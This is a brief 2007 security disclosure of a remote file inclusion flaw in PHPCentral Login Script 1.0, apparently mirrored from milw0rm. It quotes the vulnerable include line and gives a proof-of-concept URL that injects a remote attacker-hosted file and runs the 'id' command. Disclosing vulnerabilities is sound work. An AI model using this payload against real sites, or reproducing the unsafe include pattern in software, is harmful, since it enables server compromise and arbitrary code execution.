PHPCentral Login Script Remote Command Execution Vulnerability

From: rizgar@linuxmail.org
To: bugtraq@securityfocus.com
Cc:
Subject: PHPCentral Login Script Remote Command Execution Vulnerability
Date:


PHPCentral Login Script Remote Command Execution Vulnerability
-----------------------------------------------------------------------

Script : PHPCentral Login Script

Version : 1.0

Site : http://www.phpcentral.org/scripts.php

Founder : Rizgar

Contact : rizgar@linuxmail.org and irc.gigachat.net #kurdhack

Thanks : Kurdish Hackers Clan(Anti Fashist Group :P), PH(HERO) , ColdHackers(nice boys)

d0rk : not d0rk :)

-----------------------------------------------------------------------

Vulnerability details : 


This vulnerability allows remote attackers to execute arbitrary code on systems with vulnerable installations of the PHPCentral Login script. 


------------------------------------------------------------------------

look at include.php


include.php ;

Lines 4 ;


include("".$_SERVER[DOCUMENT_ROOT]."/$folder/config.php");



PoC :

http://www.example.com/include.php?_SERVER[DOCUMENT_ROOT]=http://evil.txt?&cmd=id


# milw0rm.com [2007-08-10]





Copyright © 1995-2018 LinuxRocket.net. All rights reserved.